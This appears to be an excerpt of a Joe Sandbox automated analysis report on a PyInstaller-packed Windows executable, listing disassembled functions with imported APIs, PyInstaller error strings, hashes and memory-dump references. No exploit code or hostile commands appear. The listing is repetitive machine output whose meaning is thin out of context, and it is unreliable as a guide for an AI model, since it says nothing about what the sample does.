Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-3109299426
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c5f3c3bff43af4cd86bd07a7807c548e58e357e3203141b4cc75f7bd8cbe1db2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B420B62A19B4B91FB54DB14E95437433A3BF1B790B843031C40D863A4FFBEA169B21B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                                                                                                                                  • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1362fa50dfdfd3fc93e55486827689c27fcb37963acbb8735fb2e4d5df81426
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1A19A33218B8187E3148F61E58879AB771F789B84F50512AEB8D57B24CF7EE169CB00
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: de05141694ff94e9c3f3ab6e22f9ad3360813b468f6f75000a0f8683ccf379a7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41B2F273E182828BE7658F64D4407FD37A2FB46388F406135DA0E9BB94DF3AA901DB45
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00007FF6E1B3269E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B37507
                                                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32 ref: 00007FF6E1B37536
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32 ref: 00007FF6E1B3758C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E1B37774,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B32654
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: MessageBoxW.USER32 ref: 00007FF6E1B32730
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2920928814-2573406579
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 01b967fe5197d039d5d677906a6c16f2f8e1086c78fcb74707cc6cf468a9d3a6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D218333A18A4282E7249F21E8443767366FF4A384F842035E54DC26D4EF7EE156E709
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 403dc67cd9d2b6e6fc0865c3c42222488c32e86984e11f1a2ccf3050228eaa9c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F317C73608B818AEB608F61E8803ED7361FB86744F44503ADA4E97B99DF79C248D705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f26ae027410af940059ad16cf107d733135c888215406a50df865149c0eebfd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C318233618B8186DB60CF25E8403AE73A4FB8A794F505135EA8D83B95DF3DC156DB05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aa90af6a4a788c2c16a02cea0e9581d0bf20e05c721b47e02ac586f09149659d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3d557015ead9ccafe16da20d7371cff23c5c964749b4b55fa6747d87dfbd5991
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa90af6a4a788c2c16a02cea0e9581d0bf20e05c721b47e02ac586f09149659d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB1B223F1869641EB619B25D4003BD7392EB46BE4F446131EE5E87BC5EE3EE441E30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cfde0ae180592766ffdca5ecd532763664ec816c53feccae227f06d2b57829b5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3C10473B1928687E7248F66E04476AB7A2F789B84F44A134DB4A83754DF3EE801DB44
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8b25e3c68ba7baaabd68322c46448ad60cfbd3a9ae1785b3267c67ba6f86fd08
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB17973600B898BEB15CF2AD8463683BE1F745B88F188825DA5D877A4CF3AD491D705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
